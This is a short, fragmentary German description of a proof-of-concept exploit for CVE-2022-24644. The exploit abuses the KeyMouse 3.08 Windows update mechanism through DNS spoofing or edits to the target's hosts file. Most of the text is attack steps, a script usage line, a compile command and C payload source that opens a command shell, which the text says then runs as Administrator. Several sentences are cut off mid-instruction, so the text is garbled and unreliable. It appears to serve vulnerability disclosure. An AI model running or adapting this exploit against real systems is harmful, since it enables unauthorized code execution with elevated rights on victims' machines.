
Proof-of-Concept-Exploit für CVE-2022-24644, der eine nicht authentifizierte Remote-Codeausführung über DNS-Spoofing gegen den KeyMouse-Windows-3.08-Update-Mechanismus demonstriert.
ZZ Inc. KeyMouse 3.08 (Windows) Schwachstelle für nicht authentifizierte Remote-Codeausführung im Update
Verwendung: python3 cve-2022-24644_poc.py
Details im Bericht unter gerr.re.
www.keymouse.com auf unsere Angreifer-IP ein;
c:\windows\system32\drivers\etc\hosts auf dem Zielsystem zu bearbeiten.
proof.c auf dem Angreifersystem, z. B. mit i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
Infolgedessen wird proof.exe im Kontext des Benutzers Administrator mit hoher Integrität ausgeführt.